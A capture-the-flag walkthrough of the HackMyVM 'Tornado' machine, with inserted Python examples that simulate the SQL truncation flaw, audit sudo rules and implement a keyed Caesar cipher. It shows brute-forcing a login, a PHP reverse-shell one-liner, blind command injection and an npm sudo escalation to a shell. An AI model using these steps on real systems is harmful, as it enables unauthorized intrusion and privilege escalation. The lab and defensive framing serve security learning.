
HackMyVM - Tornado

Credit to the creator of the VM @catch_me75

As always, let's start with an nmap scan.

Enumeration

# Nmap 7.91 scan initiated Wed Dec 30 10:01:46 2020 as: nmap -sC -sV -p22,80 -oN nmap IP
Nmap scan report for tornado (IP)
Host is up (0.00064s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 0f:57:0d:60:31:4a:fd:2b:db:3e:9e:2f:63:2e:35:df (RSA)
|   256 00:9a:c8:d3:ba:1b:47:b2:48:a8:88:24:9f:fe:33:cc (ECDSA)
|_  256 6d:af:db:21:25:ee:b0:a6:7d:05:f3:06:f0:65:ff:dc (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 08:00:27:45:15:72 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 30 10:01:53 2020 -- 1 IP address (1 host up) scanned in 7.62 seconds

When we visit the website we see the Apache2 default page, so let's fire up gobuster and enumerate port 80.

gobuster dir -q -u http://$ip/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak -o gobuster.txt

/index.html (Status: 200)
/manual (Status: 301)
/javascript (Status: 301)
/bluesky (Status: 301)
/server-status (Status: 403)

We have a /bluesky directory and nothing else of interest... hmm. Let's enumerate that one.


gobuster dir -q -u http://$ip/bluesky -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak -o gobuster.txt

/index.html (Status: 200)
/contact.php (Status: 302)
/about.php (Status: 302)
/login.php (Status: 200)
/signup.php (Status: 200)
/css (Status: 301)
/imgs (Status: 301)
/js (Status: 301)
/logout.php (Status: 302)
/dashboard.php (Status: 302)
/port.php (Status: 302)

We can see a login page.


Let's have a look at the source code of the login form:

<input type="text" name="uname" placeholder="email" maxlength="13"><br><br>
<input type="password" name="upass" placeholder="password"><br><br>
<input type="submit" value="Login" name="btn" class="button"><br>

We can see that the uname field has a maximum length of 13 characters.
There was also a signup.php page. Have a look at it and sign up.


In the dashboard we can navigate between home, about and portfolio. Only the contact page cannot be used: the comment feature has been turned off for security reasons. In the source code of "Portfolio" we find a hint.


Hmm, interesting! Let's check it out.

I tried an LFI to read the imp.txt file but got nothing. Then I remembered that Apache can define URL aliases in its config file, and that on Linux cd ~user means the home directory of user, so I tried ~tornado and there I found imp.txt.


imp.txt

ceo@tornado
cto@tornado
manager@tornado
hr@tornado
lfi@tornado
admin@tornado
jacob@tornado
it@tornado
sales@tornado

We find several emails, and I brute-forced the login for all of them with the rockyou dictionary.
The only password I found was admin@tornado:hello.
But that turned out to be a rabbit hole: we do not find anything new after logging in.


Do you remember the maximum character length of 13?
This brings me to the SQL Truncation Attack.

SQL truncation is a very interesting flaw that arises when the database silently cuts input down to a column's defined length: the application checks whether the full string already exists, finds nothing, and inserts it, but the stored value is truncated to an existing username. Successful exploitation leads to user account compromise, as it means an attacker can access any user's account with a password of his own choosing. Sounds interesting!

<input type="text" name="uname" placeholder="email" maxlength="13">

Change the maxlength from 13 to 15:

<input type="text" name="uname" placeholder="email" maxlength="15">

Let's not waste time and register with the email jacob@tornado followed by one space and one extra character.
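To make the mechanics concrete, here is an added example (not code from the write-up or from the VM) that simulates the registration and login flow against a MySQL-style VARCHAR(13) column with strict mode off, beside a hardened version of the same routine. The page does not say which database the box runs, so the truncation and trailing-space comparison behaviour, the class and function names, and every username and password below are assumptions and constructed values.

```python
"""Simulation of a SQL truncation flaw and its fix (added example).

The UserTable class stands in for a users table whose uname column is
VARCHAR(13). Two assumed database behaviours make the attack work:
  * non-strict mode: values longer than the column are silently truncated
  * PAD SPACE comparison: trailing spaces are ignored when comparing strings
"""

COLUMN_LEN = 13      # width of the uname column, matching maxlength="13"
MAX_INPUT_LEN = 13   # limit the hardened code enforces server-side


class UserTable:
    """Tiny in-memory stand-in for a users table with a truncating column."""

    def __init__(self):
        self.rows = []  # (uname, upass) tuples in insertion order

    @staticmethod
    def _norm(value):
        # PAD SPACE semantics: trailing spaces are not significant
        return value.rstrip(" ")

    def find_by_name(self, uname):
        """SELECT * FROM users WHERE uname = ?"""
        return [r for r in self.rows if self._norm(r[0]) == self._norm(uname)]

    def insert(self, uname, upass):
        """INSERT INTO users ...; non-strict mode truncates instead of failing."""
        self.rows.append((uname[:COLUMN_LEN], upass))

    def login(self, uname, upass):
        """SELECT ... WHERE uname = ? AND upass = ?; first matching row wins."""
        for stored_name, stored_pass in self.rows:
            if self._norm(stored_name) == self._norm(uname) and stored_pass == upass:
                return stored_name
        return None


def register_vulnerable(db, uname, upass):
    """Uniqueness check on the full string, then insert; the DB truncates."""
    if db.find_by_name(uname):   # 'jacob@tornado a' != 'jacob@tornado', so passes
        return False
    db.insert(uname, upass)      # stored as 'jacob@tornado': a second jacob row
    return True


def register_hardened(db, uname, upass):
    """Enforce the column limit server-side and reject untrimmed input, so the
    value that is checked for uniqueness is exactly the value that is stored.
    A UNIQUE index on uname and strict SQL mode belong on the DB side too."""
    canonical = uname.strip()
    if canonical != uname or len(canonical) > MAX_INPUT_LEN:
        return False
    if db.find_by_name(canonical):
        return False
    db.insert(canonical, upass)
    return True


def demo():
    """Replay the write-up's registration against both versions."""
    attack_name = "jacob@tornado" + " " + "a"   # 15 chars: 13 + space + 1

    db = UserTable()
    db.insert("jacob@tornado", "jacobs-real-secret")   # constructed legitimate row
    vulnerable_ok = register_vulnerable(db, attack_name, "attacker-pass")
    hijacked = db.login("jacob@tornado", "attacker-pass")

    db2 = UserTable()
    db2.insert("jacob@tornado", "jacobs-real-secret")
    hardened_ok = register_hardened(db2, attack_name, "attacker-pass")
    still_safe = db2.login("jacob@tornado", "attacker-pass")

    return vulnerable_ok, hijacked, hardened_ok, still_safe


if __name__ == "__main__":
    print(demo())   # (True, 'jacob@tornado', False, None)
```

The point the simulation makes is that the client-side maxlength is not the control that failed: the uniqueness check and the stored value diverged because the database was allowed to change the input after the check. Rejecting over-long input on the server, enforcing a UNIQUE constraint and running the database in strict mode each close the gap independently.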


So we registered jacob via this form and then logged in to the application: "Welcome User jacob@tornado" confirms the login succeeded.

We find a comment field on the contact page that was not available before.


Here's the tricky part: if you run the id command through the contact page, it will not show you any output. Using a sleep 30 command confirmed that this is a (blind) RCE vulnerability.

Shell as www-data

Start a Netcat listener and use a PHP reverse shell:

php -r '$sock=fsockopen("Ip",Port);exec("/bin/sh -i <&3 >&3 2>&3");'

www-data@tornado:/var/www/html/bluesky$ whoami && id
whoami && id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@tornado:/var/www/html/bluesky$

sudo -l
(catchme) NOPASSWD: /usr/bin/npm

npm is a package manager for the JavaScript programming language.

Road to User

First I created an index.js file:
cd /tmp
mkdir shell
echo 'module.exports = install could be dangerous' > index.js
cp index.js shell

Now we need a package.json file, and chmod to make it executable:

{ "name": "shell", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { "shell": "/bin/bash" }, "author": "", "license": "ISC" }

Finally, run the script with:

sudo -u catchme npm run-script shell
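From the defender's side, the lesson of this step is that a sudo rule for npm is a sudo rule for a shell, because npm run-script executes whatever the caller puts in package.json "scripts". The following is an added example (not from the write-up) of a small audit that parses sudo -l output and flags such entries. The sample output is constructed around the rule found on the box; the set of script-running binaries, the regex and the function names are my assumptions.

```python
"""Audit `sudo -l` output for rules that hand out a shell as another user.

Added example. Assumed: the caller has already captured the text of
`sudo -l` (the constructed SAMPLE_SUDO_L below stands in for it).
"""
import re

# Binaries whose normal job is to execute scripts supplied by the caller.
# npm is listed because `npm run-script` runs the "scripts" of a package.json
# the caller controls; granting it via sudo equals granting a shell as runas.
SCRIPT_RUNNERS = {"npm"}   # assumption: extend with the binaries you track

# Matches "(runas) [NOPASSWD:] /path/cmd args, /other/cmd" lines.
ENTRY_RE = re.compile(r"^\s*\(([^)]+)\)\s*(NOPASSWD:)?\s*(.+)$")

# Constructed sample, modelled on the rule the write-up found for www-data.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on tornado:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User www-data may run the following commands on tornado:
    (catchme) NOPASSWD: /usr/bin/npm
    (root) /usr/bin/ls /var/log/apache2
"""


def parse_sudo_l(text):
    """Return one dict per rule: runas, nopasswd (bool), commands (list)."""
    entries = []
    in_commands = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_commands = True      # rules follow this header line
            continue
        if not in_commands:
            continue                # skip the Defaults section
        m = ENTRY_RE.match(line)
        if not m:
            continue
        runas, nopasswd, cmds = m.groups()
        entries.append({
            "runas": runas.strip(),
            "nopasswd": nopasswd is not None,
            "commands": [c.strip() for c in cmds.split(",") if c.strip()],
        })
    return entries


def find_risky_entries(entries):
    """Flag commands whose binary executes caller-supplied scripts."""
    findings = []
    for entry in entries:
        for cmd in entry["commands"]:
            binary = cmd.split()[0].rsplit("/", 1)[-1]   # '/usr/bin/npm' -> 'npm'
            if binary in SCRIPT_RUNNERS:
                findings.append({
                    "runas": entry["runas"],
                    "command": cmd,
                    "nopasswd": entry["nopasswd"],
                    "reason": f"{binary} runs caller-supplied scripts; "
                              f"equivalent to a shell as {entry['runas']}",
                })
    return findings


def audit(text):
    """Convenience wrapper: parse then flag."""
    return find_risky_entries(parse_sudo_l(text))


if __name__ == "__main__":
    for finding in audit(SAMPLE_SUDO_L):
        flag = "NOPASSWD " if finding["nopasswd"] else ""
        print(f"[!] {flag}({finding['runas']}) {finding['command']}: {finding['reason']}")
```

The fix on the host is the same whichever binary is involved: remove the rule, or if catchme genuinely needs www-data to run a build, wrap the exact command in a script that the rule names with fixed arguments, so the invoked package.json is not attacker-controlled.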



Shell as root

I enumerated a lot but really didn't find anything exploitable.
In the home directory of catchme you will find a Python script called enc.py.

It's a keyed Caesar cipher, similar to rot13.

Find the encrypted string inside and either rewrite the code, or go to this website (http://rumkin.com/tools/cipher/caesar-keyed.php) and enter each letter individually.
Example: a, b, c, d, e

Once you have done it correctly, you will find the root password :)
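For readers who prefer to rewrite the code rather than use the website, here is an added example (not the enc.py from the box, whose contents the write-up does not reproduce) of a keyed Caesar cipher in the style described: a keyword builds the substitution alphabet and an optional shift rotates it, which with an empty key and a shift of 13 is exactly rot13. The key word "tornado", the sample text and the function names are constructed assumptions.

```python
"""Keyed Caesar cipher (added example, not the VM's enc.py).

A keyed Caesar alphabet is the key's unique letters followed by the rest of
a..z in order; each plaintext letter at position i of a..z is replaced by the
letter at position i of that alphabet, rotated by `shift`.
"""
import string


def keyed_alphabet(key):
    """Build the substitution alphabet from a keyword (duplicates dropped)."""
    seen = []
    for ch in key.lower() + string.ascii_lowercase:
        if ch in string.ascii_lowercase and ch not in seen:
            seen.append(ch)
    return "".join(seen)


def _rotated(key, shift):
    alpha = keyed_alphabet(key)
    shift %= 26
    return alpha[shift:] + alpha[:shift]


def shift_encrypt(text, key, shift=0):
    """Map a..z onto the rotated keyed alphabet; keep case, pass non-letters."""
    rotated = _rotated(key, shift)
    out = []
    for ch in text:
        low = ch.lower()
        if low in string.ascii_lowercase:
            sub = rotated[string.ascii_lowercase.index(low)]
            out.append(sub.upper() if ch.isupper() else sub)
        else:
            out.append(ch)
    return "".join(out)


def shift_decrypt(text, key, shift=0):
    """Inverse of shift_encrypt for the same key and shift."""
    rotated = _rotated(key, shift)
    out = []
    for ch in text:
        low = ch.lower()
        if low in string.ascii_lowercase:
            sub = string.ascii_lowercase[rotated.index(low)]
            out.append(sub.upper() if ch.isupper() else sub)
        else:
            out.append(ch)
    return "".join(out)


def try_all_shifts(ciphertext, key):
    """When the keyword is known but the shift is not, list all 26 candidates
    (index s holds the decryption for shift s) and pick the readable one."""
    return [shift_decrypt(ciphertext, key, s) for s in range(26)]


if __name__ == "__main__":
    secret = shift_encrypt("Hello, world!", "tornado", 5)   # constructed sample
    print(secret)
    for s, candidate in enumerate(try_all_shifts(secret, "tornado")):
        print(f"shift {s:2d}: {candidate}")
```

Entering letters one at a time on the website, as the write-up suggests, is the manual equivalent of the lookup in shift_decrypt: the keyed alphabet is fixed by the keyword, so each ciphertext letter maps back to exactly one plaintext letter.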


Tornado created by catch_me75 (thank you)
This machine can be found at HackMyVM
> Check it out!

https://hackmyvm.eu